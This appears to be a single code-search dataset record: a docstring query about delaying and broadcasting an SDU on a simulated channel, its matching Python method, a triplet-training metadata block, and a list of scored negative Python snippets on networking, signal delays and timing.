[ "0.5844689", "0.5619299", "0.55078894", "0.54105484", "0.5367822", "0.5262961", "0.52497536", "0.51190823", "0.51019", "0.5091018", "0.508095", "0.5041397", "0.5038449", "0.50244045", "0.5019844", "0.49974367", "0.4993187", "0.49843723", "0.4972273", "0.49417922", "0.49223176", "0.49213302", "0.48968047", "0.4891377", "0.4872835", "0.48695236", "0.48598656", "0.48377714", "0.4829794", "0.481843", "0.481407", "0.48094866", "0.47910187", "0.47906727", "0.47902814", "0.47814527", "0.4777663", "0.4775837", "0.47716093", "0.4763799", "0.4756678", "0.4753771", "0.4746669", "0.47437447", "0.47417003", "0.4733524", "0.47323278", "0.47298884", "0.4726929", "0.4723887", "0.47238508", "0.4711896", "0.470907", "0.47026837", "0.4694029", "0.4690409", "0.4689618", "0.4681312", "0.46711877", "0.4668667", "0.4665937", "0.46598217", "0.465732", "0.46556476", "0.4648402", "0.46345684", "0.46329218", "0.46296674", "0.46241677", "0.4617678", "0.4617391", "0.4614852", "0.46030444", "0.45964006", "0.4592549", "0.45907286", "0.45875496", "0.45829165", "0.45618254", "0.45574647", "0.4552248", "0.45516226", "0.45474654", "0.4546037", "0.45390937", "0.45305657", "0.45297047", "0.45268255", "0.4525862", "0.4520766", "0.45206627", "0.45198286", "0.451763", "0.45122856", "0.45022643", "0.44995463", "0.44970995", "0.4491858", "0.44905382", "0.44900677" ]
0.84005505
0
delay the SDU by the channel time, then broadcast to all attached phys (including the sender)
def _receive_request(self, sdu):\n if self._busy:\n raise RuntimeError("Channel busy")\n self._busy = True\n self._propagate(sdu)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def udelay(us: int, /) -> None:", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.ax25_udp_pdu_receiver_sptr_declare_sample_delay(self, *args)", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.ax25_udp_pdu_gen_sptr_declare_sample_delay(self, *args)", "def broadcast(self, session, params):\n session.set_status('running')\n FMT = self.udp_schema['format']\n FMT_LEN = struct.calcsize(FMT)\n UDP_PORT = self.udp['port']\n udp_data = []\n fields = self.udp_schema['fields']\n session.data = {}\n\n # BroadcastStreamControl instance.\n stream = self.acu_control.streams['main']\n\n class MonitorUDP(protocol.DatagramProtocol):\n def datagramReceived(self, data, src_addr):\n host, port = src_addr\n offset = 0\n while len(data) - offset >= FMT_LEN:\n d = struct.unpack(FMT, data[offset:offset + FMT_LEN])\n udp_data.append(d)\n offset += FMT_LEN\n\n handler = reactor.listenUDP(int(UDP_PORT), MonitorUDP())\n influx_data = {}\n influx_data['Time_bcast_influx'] = []\n for i in range(2, len(fields)):\n influx_data[fields[i].replace(' ', '_') + '_bcast_influx'] = []\n\n active = True\n last_packet_time = time.time()\n\n while session.status in ['running']:\n now = time.time()\n if len(udp_data) >= 200:\n if not active:\n self.log.info('UDP packets are being received.')\n active = True\n last_packet_time = now\n\n process_data = udp_data[:200]\n udp_data = udp_data[200:]\n for d in process_data:\n data_ctime = sh.timecode(d[0] + d[1] / sh.DAY)\n self.data['broadcast']['Time'] = data_ctime\n influx_data['Time_bcast_influx'].append(data_ctime)\n for i in range(2, len(d)):\n self.data['broadcast'][fields[i].replace(' ', '_')] = d[i]\n influx_data[fields[i].replace(' ', '_') + '_bcast_influx'].append(d[i])\n acu_udp_stream = {'timestamp': self.data['broadcast']['Time'],\n 'block_name': 'ACU_broadcast',\n 'data': self.data['broadcast']\n }\n self.agent.publish_to_feed('acu_udp_stream',\n acu_udp_stream, from_reactor=True)\n influx_means = {}\n for key in influx_data.keys():\n influx_means[key] = np.mean(influx_data[key])\n influx_data[key] = []\n acu_broadcast_influx = {'timestamp': influx_means['Time_bcast_influx'],\n 'block_name': 'ACU_bcast_influx',\n 'data': influx_means,\n }\n self.agent.publish_to_feed('acu_broadcast_influx', acu_broadcast_influx, from_reactor=True)\n sd = {}\n for ky in influx_means:\n sd[ky.split('_bcast_influx')[0]] = influx_means[ky]\n session.data.update(sd)\n else:\n # Consider logging an outage, attempting reconfig.\n if active and now - last_packet_time > 3:\n self.log.info('No UDP packets are being received.')\n active = False\n next_reconfig = time.time()\n if not active and params['auto_enable'] and next_reconfig <= time.time():\n self.log.info('Requesting UDP stream enable.')\n try:\n cfg, raw = yield stream.safe_enable()\n except Exception as err:\n self.log.info('Exception while trying to enable stream: {err}', err=err)\n next_reconfig += 60\n yield dsleep(1)\n\n yield dsleep(0.005)\n\n handler.stopListening()\n return True, 'Acquisition exited cleanly.'", "def delay_writing_for(self, ms, soc):\n self._log(\"waiting %sms before responding...\" % ms)\n\n def resume_writing():\n self._write_list.append(soc)\n\n self._write_list.remove(soc)\n self._timer_list.append((_nowms() + ms, resume_writing))", "def sample_delay(self, which):\n return _spacegrant_swig.ax25_udp_pdu_gen_sptr_sample_delay(self, which)", "def sample_delay(self, which):\n return _spacegrant_swig.ax25_udp_pdu_receiver_sptr_sample_delay(self, which)", "def _delay(self, 
n=None):", "def sample_delay(self, *args, **kwargs):\n return _uhd_swig.usrp_sink_sptr_sample_delay(self, *args, **kwargs)", "async def sleep(cls, delay: float) -> None:", "def send_signal():\n print(\"... run {0} transmission\".format(SendSignal.__SIGNAL_SETTINGS['repeats']))\n SendSignal.__SIGNAL_OBJ.RFxmit(SendSignal.__SIGNAL_SETTINGS['text_message'] *\n SendSignal.__SIGNAL_SETTINGS['repeats'])\n print('... set USB Dongle idle')\n SendSignal.__SIGNAL_OBJ.setModeIDLE()", "def __stream_triggered(self):\n # Call this every time period\n thread = Timer(self.stream_time, self.__stream_triggered)\n thread.start()\n self.__threads.append(thread)\n\n if len(self.__spike_buffer) > 2:\n speed = self.__get_speed()\n print(speed)\n self.__stream_send(speed)", "def send_sus_list(key):\n while True:\n if not receive_sus():\n signature = key.create_signature(json.dumps(SUS) + '2')\n\n pack_send = Ether(dst='98:98:98:22:22:22') / \\\n IP(dst='172.16.104.16') / \\\n UDP(dport=2223, sport=2223) / \\\n DB(len_sign=len(signature), cmd=2,\n send_num=5, param=signature + json.dumps(SUS).encode())\n\n conf.iface = 'eth0'\n sendp(pack_send)", "def _schedule_send_in_order(self, rudp_packet, timeout):\n final_packet = self._finalize_packet(rudp_packet)\n seqnum = rudp_packet.sequence_number\n timeout_cb = REACTOR.callLater(0, self._do_send_packet, seqnum)\n self._sending_window[seqnum] = self.ScheduledPacket(\n final_packet,\n timeout,\n timeout_cb,\n 0\n )", "def __delay(msecs):\n time.sleep(msecs / 1000)", "def delay_requests(self, seconds: float):\n delta_since_last_send = time.time() - self._last_send\n self._last_send = (time.time() - delta_since_last_send) + seconds", "def send_blocking_signal(self, compression=True):\n while not self._stop_receive.is_set():\n if len(self._send_queue) > 0:\n super(MastermindClientUDP, self).send(JSONSerializer.serialize(self._send_queue.pop()), compression)\n else:\n super(MastermindClientUDP, self).send(JSONSerializer.serialize(DummyEvent()), compression)\n time.sleep(1)", "def _do_send_packet(self, seqnum):\n sch_packet = self._sending_window[seqnum]\n if sch_packet.retries >= constants.MAX_RETRANSMISSIONS:\n self.shutdown()\n else:\n self._proto.send_datagram(sch_packet.rudp_packet, self.relay_addr)\n sch_packet.timeout_cb = REACTOR.callLater(\n sch_packet.timeout,\n self._do_send_packet,\n seqnum\n )\n sch_packet.retries += 1\n self._cancel_ack_timeout()", "def client_send(state):\n while state.running:\n disconnected_users = []\n time.sleep(0.05)\n for nick in users:\n nick, queue = nick, users[nick].queue\n while len(queue) > 0:\n sender, msg = queue.pop(0)\n message = '{}> {}'.format(sender, msg)\n print(message)\n try:\n for _usr in channels['SYSAR']:\n # if _usr != sender:\n print('should send')\n send_buf(users[_usr].socket, message)\n except:\n if nick not in disconnected_users:\n disconnected_users.append(nick)\n for nick in disconnected_users:\n print('ALERT::{} disconnected'.format(nick))\n del users[nick]", "def send_state():\n while True:\n if I_AM_CRUSHED is False:\n sleep_time = random.randint(send_state_sec[0], send_state_sec[1])\n sock_check = socket.socket(type=socket.SOCK_DGRAM)\n sock_check.sendto(\"I'am healthy\", ('dispatcher', port_for_check))\n sock_check.close()\n time.sleep(sleep_time)", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.ax25_pdu_packer_sptr_declare_sample_delay(self, *args)", "def broadcast(self, txt):\n\n for i in self.state['joinedchannels']:\n self.say(i, txt, speed=-1)", "def sendto(self, msg, addr, 
family):\n sock = socket.socket(family, socket.SOCK_DGRAM)\n sock.sendto(msg, addr)\n time.sleep(0.1)", "def sleep(self,length=10):\n self.rs485.write_command('#{}bs {}'.format(self.address,length))", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.udp_debug_sptr_declare_sample_delay(self, *args)", "def on_send_sd(self, e):\n # get channel selected\n selected_index = self.channel_list.GetSelection()\n # ask user for seconds duration\n dlg = wx.TextEntryDialog(\n self, 'How long do you want that message to last?', 'Message duration in seconds')\n # if the user presses OK,\n if dlg.ShowModal() == wx.ID_OK:\n # get the duration\n duration = int(dlg.GetValue())\n # if a channel is selected,\n if selected_index != -1:\n # send the message and clear the input buffer\n self.send_wrap({\n \"action\": \"user_message\",\n \"duration\": duration,\n \"channel\": self.channel_list.GetString(selected_index),\n \"flags\": [\"sd\"],\n \"timestamp\": int(datetime.datetime.utcnow().timestamp()),\n \"message\": self.user_input.GetValue()\n })\n self.user_input.SetValue(\"\")\n else:\n dialog = wx.MessageDialog(\n self, \"No channel is selected.\", \"Warning\", wx.ICON_WARNING)\n dialog.ShowModal()\n dialog.Destroy()", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.ax25_pdu_unpacker_sptr_declare_sample_delay(self, *args)", "def sample_delay(self, *args, **kwargs):\n return _TestA_swig.my_qpsk_demod_cb_sptr_sample_delay(self, *args, **kwargs)", "def Sleep(self):\n sleep(self.pSampling)", "def _schedule_send_out_of_order(self, rudp_packet):\n final_packet = self._finalize_packet(rudp_packet)\n self._proto.send_datagram(final_packet, self.relay_addr)", "def begin_sending_packets():\n monitoru = main_monitoring.MainMonitoring()\n monitoru.start_monitor_loop()", "def delay(ms: int, /) -> None:", "def syncloss(self):\n # expect a disassociation indication with a correct status\n assert(self.a.nxapi_disassociate_ind() == True)\n \n # generate a random frame\n msdu = self.host.tx_msdu(da=self.ap1.macaddr, length=1000, prio=1)\n \n # wait for data send confirmation (not in the air)\n self.a.host_send_data_cfm(msdu)", "def dmx_send_frame(self):\n if self.flag_connected:\n try:\n temp_array = array.array('B')\n for channel_index in range(0, self.channel_count):\n temp_array.append(self.channels[channel_index])\n\n # print(\"temp_array:{}\".format(temp_array))\n # print(\"send frame..\")\n self.wrapper.Client().SendDmx(\n self.universe,\n # self.channels,\n temp_array,\n self.dmx_send_callback\n )\n # print(\"done.\")\n except OLADNotRunningException:\n self.wrapper.Stop()\n print(\"olad not running anymore.\")\n else:\n # throw error\n pass", "def send(self):\n send_pos = 0 \n\n # send list not empty\n if(len(self.send_list) == 0): \n if(len(self.send_wait) == 0):\n return False\n self.send_list.append(self.send_wait[0]) # add send list\n self.send_pos_frame.append(0)\n self.send_wait.pop(0) # refresh send_wait\n\n send_now = self.send_list[send_pos]\n host = send_now[0] # port send frame\n frame = send_now[1] \n\n bit = frame.get_bit(self.send_pos_frame[send_pos])\n\n q = Queue()\n\n q.put((host,'s'))\n \n # 's': send, 'r': receive\n while not q.empty():\n front = q.get()\n name_port = front[0]\n tp = front[1] # type operation: 'r' o 's'\n\n name = Tools.get_device_name(name_port)\n port = Tools.get_device_port_index(name_port)\n\n dev = self.get_device(name)\n \n if(tp == 's'):\n new_dev = dev.send(bit, port)\n else: # tp == 'r'\n new_dev = dev.receive(bit, port)\n \n for i in 
new_dev:\n q.put(i)\n\n # signal time\n self.signal_count += 1\n if(self.signal_count == self.signal_time):\n self.send_pos_frame[send_pos] += 1\n if(self.send_pos_frame[send_pos] == frame.length()): # if frame send complete\n #reset send list\n self.send_list.pop(send_pos)\n self.send_pos_frame.pop(send_pos)\n\n self.signal_count = 0\n\n return True", "def send_command(s, IP, PORT, sec, cmd, seq, bits):\n # print(IP, PORT)\n # print(s)\n # s.connect((IP, PORT))\n if sec > 1:\n sleep_time = .03\n else:\n sleep_time = sec / 10\n start = time.time()\n while time.time() < (start + sec):\n print(\"sending\")\n s.sendto(cmd.format(seq, bits).encode('utf-8'), (IP, PORT))\n time.sleep(sleep_time)\n seq += 1\n # s.close()\n return seq", "async def loop():\n # ArmDevice.storage.joints_pos = await get_positions() # Use this if encoders are wired up.\n # ArmDevice.storage.joints_pos = simulate_positions() # Use this for testing without position feedback.\n log.debug(\"command: {}\".format(ArmDevice.storage.command))\n ArmDevice.storage.controller.user_command(ArmDevice.storage.mode, *ArmDevice.storage.command)\n ArmDevice.storage.speeds = ArmDevice.storage.controller.update_duties(ArmDevice.storage.joints_pos)\n\n # publish speeds/duty cycles here\n log.debug(\"joints_pos: {}\".format(ArmDevice.storage.joints_pos))\n log.debug(\"speeds: {}\".format(ArmDevice.storage.speeds))\n await send_duties()", "def delay(self, seconds):\n\n if self.call is None:\n return\n self.call.delay(seconds)", "def RecvAndSleep(s):\n s.recv(RECV_BYTES)\n time.sleep(SLEEP_SEC)", "def send_events(sock):\n i=0\n while i<10:\n log.info('Sending message from publisher..')\n sock.send(\"even - hai i am publisher\")\n time.sleep(0.2)\n i += 1", "def send_data_control_experiment(ecg, emg, gsr):\n\ti = 0\n\tj = 0\n\tk = 0\n\twhile True:\n\t\tif i == len(ecg): break\n\t\tskt.send(bytes(ecg[i], 'utf-8'))\n\t\ti += 1\n\t\t# blocking - always wait for ACK before sending the next packet\n\t\t# - can change this and handle out of order packets\n\t\t# ACK = soc.recv(1024)\n\n\t\t# wait for 1 sec before sending next packet\n\t\t# simulate a real time situation\n\t\t# time.sleep(1)\n\n\twhile True:\n\t\tif j == len(emg): break\n\t\tskt.send(bytes(emg[j], 'utf-8'))\n\t\tj += 1\n\n\twhile True:\n\t\tif k == len(gsr): break\n\t\tskt.send(bytes(gsr[k], 'utf-8'))\n\t\tk += 1\n\n\tstart = time.time()\n\tskt.sendall(b'A'*1024)\n\tend = time.time()\n\tprint(end - start)", "def _send(x, dst=0):\n x = torch.tensor(x)\n x = to_device(x)\n dist.send(x, dst)\n del x \n torch.cuda.empty_cache()", "def Delay( X, delay_time, feedback_amt, wetdry, apply_fb_input=True, rate=SR ):\n\n # convert inputs if scalars into np arrays\n delay_time = delay_time * np.ones(len(X)) if np.isscalar(delay_time) else delay_time\n feedback_amt = feedback_amt * np.ones(len(X)) if np.isscalar(feedback_amt) else feedback_amt\n wetdry = wetdry * np.ones(len(X)) if np.isscalar(wetdry) else wetdry\n\n # convert delay time to delay in samples\n # not implemented yet, but eventually would be good to interpolate\n maxdelay = np.max(delay_time)\n # delay_samps = np.array(delay_time*SR).astype(int)\n delay_samps = delay_time * SR\n\n # create circular buffer with appropriate size\n buffer_size = int( math.ceil( math.log(maxdelay*rate,2) ) )\n # print(buffer_size)\n delay_size = int(round(maxdelay*SR)) # approximate for now\n delaybuff = Circ_buffer( buffer_size=buffer_size, delay_size=delay_size )\n\n # make output vec\n output_sig = np.zeros(len(X)).astype(int)\n\n # process signal\n 
for ii in range(len(X)):\n\n # read delayed value\n delay_prev_samp = math.ceil( delay_samps[ii] )\n prev_samp = delaybuff.read_value( delay_prev_samp )\n delay_next_samp = delay_prev_samp - 1\n next_samp = delaybuff.read_value(delay_next_samp)\n output_sig[ii] = prev_samp + ( (next_samp - prev_samp) * (delay_prev_samp - delay_samps[ii]) )\n\n # calculate value to write\n if apply_fb_input:\n cur_value = (X[ii] + output_sig[ii]) * feedback_amt[ii]\n else:\n cur_value = X[ii] + output_sig[ii]*feedback_amt[ii]\n\n # write to buffer\n delaybuff.write_value(int(cur_value))\n\n # end for loop\n\n # return output\n return np.array(output_sig * wetdry + X * (1-wetdry)).astype(np.int16)", "def send_command(client, device_label, device_command, device_hold_secs=0):\n device_id = devices[device_label]['id']\n func = client.send_command(device_id, device_command, device_hold_secs)\n run_in_loop_now('send_command', func)\n print(\"Sent: \" + device_command + \" to \" + device_label)\n return", "def send_msg():\n\tmessage = \"%s %s %d\\n\" % (metric, activeDAHDIChannels, int(time.time()))\n\t# print 'sending message:\\n%s' % message\n\tcarbonSocket = socket.socket()\n\tcarbonSocket.connect((CARBON_HOST, CARBON_PORT))\n\tcarbonSocket.sendall(message)\n\tcarbonSocket.close()\n\tlast_send = int(time.time())", "def Delay_distortion( X, delay_time, feedback_amt, wetdry, distortion_amt, rate=SR ):\n\n # convert inputs if scalars into np arrays\n delay_time = delay_time * np.ones(len(X)) if np.isscalar(delay_time) else delay_time\n feedback_amt = feedback_amt * np.ones(len(X)) if np.isscalar(feedback_amt) else feedback_amt\n wetdry = wetdry * np.ones(len(X)) if np.isscalar(wetdry) else wetdry\n\n # convert delay time to delay in samples\n maxdelay = np.max(delay_time)\n delay_samps = np.array(delay_time*SR).astype(int)\n\n # create circular buffer with appropriate size\n buffer_size = int( math.ceil( math.log(maxdelay*rate,2) ) )\n # print(buffer_size)\n delay_size = int(round(maxdelay*SR)) # approximate for now\n delaybuff = Circ_buffer( buffer_size=buffer_size, delay_size=delay_size )\n\n # make output vec\n output_sig = np.zeros(len(X)).astype(int)\n\n # process signal\n for ii in range(len(X)):\n\n # set delay time\n delaybuff.set_delay( delay_samps[ii] )\n\n # read delayed value\n output_sig[ii] = delaybuff.read_value()\n\n # calculate value to write\n cur_value = X[ii] + output_sig[ii]*feedback_amt[ii]\n\n # add distortion\n cur_value = Distortion(cur_value, 'SIG', distortion_amt)\n\n # write to buffer\n delaybuff.write_value(int(cur_value))\n\n # end for loop\n\n # return output\n return np.array(output_sig * wetdry + X * (1-wetdry)).astype(np.int16)", "def sample_delay(self, which):\n return _spacegrant_swig.udp_debug_sptr_sample_delay(self, which)", "def __send_cmd(cmds, duration):\r\n # reset\r\n print(\"sleep\")\r\n time.sleep(duration)\r\n for cmd, wheel in zip(cmds, wheels):\r\n wheel.write(__reset())\r\n print(\"reset\")\r\n # this is a reset sleep, a const\r\n time.sleep(0.2)\r\n # write command\r\n for cmd, wheel in zip(cmds, wheels):\r\n print(\"write commands: \" + str(cmd))\r\n wheel.write(cmd)", "def _send(self) -> None:\n if not self.connected or now() < self.next_send:\n return\n self.next_send += self.poll_interval\n buff = []\n while self.outq:\n msg_id, tag, data = self.outq.popleft()\n buff.append(pickle.dumps((msg_id, tag, data)))\n if buff:\n stream = b\"\".join(buff)\n self.endpoint.sendall(stream)", "def __send(self, cmd, delay=.1):\n\n self.__write(cmd)\n\n if delay is not 
None:\n print(\"wait: %d seconds\" % delay)\n time.sleep(delay)\n\n return self.__read()", "def wake_up(self):\r\n self._write.send('1')", "def declare_sample_delay(self, *args):\n return _uhd_swig.usrp_sink_sptr_declare_sample_delay(self, *args)", "def sample_delay(self, which):\n return _spacegrant_swig.ax25_pdu_packer_sptr_sample_delay(self, which)", "def send_and_flush(self, msg):\r\n try:\r\n self.bus.send(msg)\r\n msg.data[:4] = bytearray(4)\r\n # print(\"Message sent on {}\".format(self.bus.channel_info))\r\n except can.CanError:\r\n print(\"Message NOT sent\")", "def send_mute(self, dev, action=None):\n if action not in ['true', 'false', None]:\n action = None\n\n with self.smqtt as client:\n client.publish(\n IOTLinkTopics.MUTE.format(\n domain=dev['domain'],\n device_name=dev['name']\n ),\n payload=action\n )", "def broadcast(self, msg_type, msg, t=5):\n return None", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.binary_sink_sptr_declare_sample_delay(self, *args)", "def sample_delay(self, which):\n return _spacegrant_swig.ax25_pdu_unpacker_sptr_sample_delay(self, which)", "def _attempt_enabling_looping_send(self):\n if (\n not self._looping_send.running and\n self._state == State.CONNECTED and\n len(self._sending_window) < constants.WINDOW_SIZE and\n len(self._segment_queue)\n ):\n self._looping_send.start(0, now=True)", "def sample_delay(self, *args, **kwargs):\n return _uhd_swig.usrp_source_sptr_sample_delay(self, *args, **kwargs)", "def sweep_timing(dir_out,box,channel,width,delay,scope,min_volt=None):\n print '____________________________'\n print width\n\n #fixed options\n height = 16383 \n fibre_delay = 0\n trigger_delay = 0\n pulse_number = 11100 \n #first select the correct channel and provide settings\n logical_channel = (box-1)*8 + channel\n \n sc.select_channel(logical_channel)\n sc.set_pulse_width(width)\n sc.set_pulse_height(16383)\n sc.set_pulse_number(pulse_number)\n sc.set_pulse_delay(delay)\n sc.set_fibre_delay(fibre_delay)\n sc.set_trigger_delay(trigger_delay)\n \n # first, run a single acquisition with a forced trigger, effectively to clear the waveform\n scope._connection.send(\"trigger:state ready\")\n time.sleep(0.1)\n scope._connection.send(\"trigger force\")\n time.sleep(0.1)\n\n # Get pin read\n time.sleep(0.1)\n sc.fire_sequence() # previously fire_sequence!\n #wait for the sequence to end\n tsleep = pulse_number * (delay*1e-3 + 210e-6)\n time.sleep(tsleep) #add the offset in\n sc.stop()\n\n # File system stuff\n check_dir(\"%s/raw_data/\" % (dir_out))\n directory = check_dir(\"%s/raw_data/Channel_%02d/\" % (dir_out,logical_channel))\n channels = [1,4]\n fnames = []\n fnames.append(\"%sPMTPulseWidth%05d\" % (directory,width))\n fnames.append(\"%sTriggerPulseWidth%05d\" % (directory,width))\n \n # Check scope\n ck = find_and_set_scope_y_scale(1,height,width,delay,scope,scaleGuess=min_volt)\n scope.set_edge_trigger(1.4, 4 , falling=False) # Rising edge trigger \n if ck == True:\n print \"Saving raw files to: %s and %s\" % (fnames[0],fnames[1])\n sc.fire_continuous()\n time.sleep(0.2)\n save_ck = save_scopeTraces_Multiple(fnames, scope, channels, 100)\n sc.stop()\n time.sleep(5)\n if save_ck == True:\n # Calc and return params\n xPMT,yPMT = calc.readPickleChannel(fnames[0], 1)\n xTrigger,yTrigger = calc.readPickleChannel(fnames[1], 1)\n meanJitter, JitterDev, JitterErrorOnMean = calc.calcJitter(xTrigger,yTrigger,xPMT,yPMT)\n return meanJitter, JitterErrorOnMean", "def sleep(cls, timeout):\n sleep_channel = Channel()\n try:\n 
sleep_channel.receive(timeout)\n except TimeoutError:\n pass #expected to happen after timeout", "def run(self):\r\n waiting_packet = None\r\n while True:\r\n if waiting_packet is not None:\r\n packet = waiting_packet\r\n waiting_packet = None\r\n else:\r\n packet = yield self.buffer.get()\r\n self.channel.add_sender(self)\r\n yield self.env.timeout(packet.size/self.service_rate)\r\n self.channel.remove_sender(self)\r\n packet.output_timestamp= env.now\r\n if self.destination is None:\r\n self.packet_list.append(packet)\r\n if (not self.collision):\r\n if self.destination is not None:\r\n self.destination.put(packet)\r\n self.channel.packet_list.append(packet)\r\n else:\r\n if self.debug:\r\n print(\"Packet %d is discarded. Reason: Collision\" \r\n % (packet.id))\r\n self.packets_drop += 1\r\n waiting_packet = packet\r\n self.collision = False\r\n yield self.env.timeout(self.random_delay())", "def update(self, dt):\n # handle spawing events from the bursts\n for burst in self.bursts.keys():\n b = self.bursts[burst] \n trigger = b.update(dt) \n if trigger: \n pool, gain, position = trigger \n name = self.unique_name()\n self.spawn_pool(pool, name)\n snd = self.sounds[name]\n snd.gain.set_with_time(gain, 0.0)\n snd.position.set_with_time(np.array(position), 0.0) \n self._start_sound(snd,[])\n \n kill_list = [] \n # and then each of layers (e.g. to make sure fades take effect)\n for sound in self.sounds.keys():\n snd = self.sounds[sound]\n if snd is None or snd.finished:\n kill_list.append(sound)\n else:\n snd.update(dt)\n \n # each of the channel groups (must do this after sounds for override to work)\n \n for ch_group in self.channel_groups.keys():\n self.channel_groups[ch_group].update(dt) \n \n for sound in kill_list:\n if self.sounds[sound] is not None and self.sounds[sound].transient:\n logging.debug(\"Removing finished sound %s\" % sound) \n del self.sounds[sound]\n # update FMOD \n system.update()", "def delay(seconds):\n\n # Perform the delay\n time.sleep(seconds)", "def RandomDelay():\r\n sleep(random())", "def _sleep(self):\n while 1:\n diff = (time.time()-self.lastcall) - self.mindelay\n if diff >= 0: return\n time.sleep(max(-diff/2.0, 0.01))", "def start_wireless_sensing(self):\n\n gps_pos = self.dc.read_gps()\n n_samples = 256 # DON'T CHANGE TO 128!!!!! 
IT CAUSES KERNEL PANIC (unless you change tick or find another fix)\n if IS_SIMULATION:\n dBm = self.get_simulated_dBm()\n # dBm = random.uniform(-1, -10)\n self.dBm = dBm\n self.ContSamples += 1\n time.sleep(0.01)\n else:\n self.ContSamples += 1\n samples = self.sdr.read_samples(n_samples)\n dBm = 10 * np.log10(np.mean(np.power(np.abs(samples), 2)))\n self.dBm = dBm\n\n if self.ContSamples > self.SamplesToDiscard:\n\n wireless_msg0 = HotspotWirelessMessage(\n location=gps_pos,\n sdr=[],\n dBm=dBm,\n )\n self.flight_logger.log(wireless_msg0)\n\n now = time.time()\n # if ((dBm > THRESHOLD_dBm) and (now - self.lastInsert) >= THRESHOLD_Sampling):\n\n if (now - self.lastInsert) >= THRESHOLD_Sampling:\n if self.FLAG == 2:\n wireless_msg = HotspotWirelessMessage(\n location=self.dc.read_gps(),\n sdr=[],\n dBm=self.dBm,\n )\n self.wireless_logger.log(wireless_msg)\n\n if self.FLAG == 1:\n wireless_msg2 = HotspotFilterMessage(\n hotcaltime=self.hottime,\n alepcaltime=self.aleptime,\n survetime=self.surveytime,\n swarmtime=self.swarmtime,\n FLAG=self.FLAG,\n location=self.dc.read_gps(),\n sdr=[],\n dBm=self.dBm,\n )\n\n self.wireless_filter.log(wireless_msg2)\n\n self.wireless_data.append(wireless_msg0)\n\n self.lastInsert = time.time()\n # if len(self.wireless_data) >= SAMPLES_SWARM * self.sentData:\n if len(self.wireless_data) >= SAMPLES_SL:\n # self.sentData +=1\n self.ready_to_send = True", "def test_send():\n\n print \"Sending Note Ons....\"\n f = open(PIMIDI_DEV, \"wb\")\n for note_no in xrange(0x3c, 0x48, 2):\n for j in (chr(0x90), chr(note_no), chr(0x60)):\n f.write(j)\n sleep(1)\n f.close()", "def scheduleIn(self,delay,cb,uniqueTag=None,priority=0,exceptCurrentASN=True):\n\n with self.dataLock:\n asn = int(self.asn+(float(delay)/float(self.settings.slotDuration)))\n\n self.scheduleAtAsn(asn,cb,uniqueTag,priority,exceptCurrentASN)", "def handle_congestion(self):\n print(\"\\nNetwork is congested! Sending rate is decreased.\\n\")\n self.delay *= 1.2\n time.sleep(1)", "def sleep(self):\n self._epd.sleep()", "def declare_sample_delay(self, *args):\n return _TestA_swig.my_qpsk_demod_cb_sptr_declare_sample_delay(self, *args)", "def delay(fs, x, dt, keep_length=True, axis=-1):\n dn = int(round(dt * fs))\n x = np.asarray(x)\n n = x.shape[axis]\n\n if dn > 0:\n # delay\n zeros_shape = list(x.shape)\n zeros_shape[axis] = dn\n zeros = np.zeros(zeros_shape)\n\n delayed = np.concatenate((zeros, x), axis=axis)\n\n if keep_length:\n # slice that takes 0 to ntaps samples along axis\n slc = [slice(None)] * len(x.shape)\n slc[axis] = slice(0, n)\n delayed = delayed[tuple(slc)]\n\n elif dn < 0:\n # pre-delay\n slc = [slice(None)] * len(x.shape)\n slc[axis] = slice(-dn, n)\n delayed = x[tuple(slc)]\n\n if keep_length:\n zeros_shape = list(x.shape)\n zeros_shape[axis] = -dn\n zeros = np.zeros(zeros_shape)\n delayed = np.concatenate((delayed, zeros), axis=axis)\n else:\n # no delay\n delayed = x\n\n return delayed", "def send_packet(self, pk):\n try:\n self.out_queue.put(pk, True, 2)\n except queue.Full:\n if self.link_error_callback:\n self.link_error_callback('RadioDriver: Could not send packet'\n ' to copter')", "def main(s0, s1, s2, s3, delayFunc, dm, decimate = 0):\n\n\t# Ignore, testing\n\n\n\t# Get the delays (in seconds)\n\tprint(\"Finding time delays...\")\n\tdelays = delayFunc(absftop, -100. 
/ 512, nchans, dm)\n\tprint(\"Delays (s):\")\n\tprint(delays)\n\tdelays /= sampleRate\n\tdelays = delays.astype(int)\n\n\t# Build up a \n\toutputLen = int(s0.shape[0] - np.max(delays))\n\tdataOut = np.ones((outputLen, nchans), dtype = np.int32)\n\tprint(delays)\n\n\t# Terribl approach to RFI\n\tzapchans = list(range(150,200)) + list(range(280, 290)) + list(range(305, 320)) + list(range(450, nchans))\n\n\t# SImple implementation that works, but isn't cache efficient\n\tprint(\"Forming Stokes I + Dedispersing... processing channel:\")\n\tfor i in range(nchans):\n\t\tif i in zapchans:\n\t\t\tcontinue\n\t\tprint(f\"{i} ({100 * i / min(430,nchans)} %)\", end = '\\r')\n\t\tdataOut[..., i] += np.square(s0[delays[i]: delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[..., i] += np.square(s1[delays[i]: delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[..., i] += np.square(s2[delays[i]: delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[..., i] += np.square(s3[delays[i]: delays[i] + outputLen, i].astype(np.int32))\n\n\t# Cache efficient but untested\n\t\"\"\"\n\tprint(\"Forming Stokes I + Dedispersing... processing sample:\")\n\tblockCount = 128\n\tblockSize = int(dataOut.shape[0] / blockCount)\n\tfor i in range(blockCount):\n\t\tif i in zapchans:\n\t\t\tcontinue\n\t\tprint(f\"{i* blockSize} -> {(i + 1) * blockSize} ({100 * i / blockCount:07.3f} %)\", end = '\\r')\n\t\tdataOut[i * blockSize: (i+1) * blockSize, :] += np.square(s0[i * blockLength + delays[i]: (i + 1) * blockLength + delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[i * blockSize: (i+1) * blockSize, :] += np.square(s1[i * blockLength + delays[i]: (i + 1) * blockLength + delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[i * blockSize: (i+1) * blockSize, :] += np.square(s2[i * blockLength + delays[i]: (i + 1) * blockLength + delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[i * blockSize: (i+1) * blockSize, :] += np.square(s3[i * blockLength + delays[i]: (i + 1) * blockLength + delays[i] 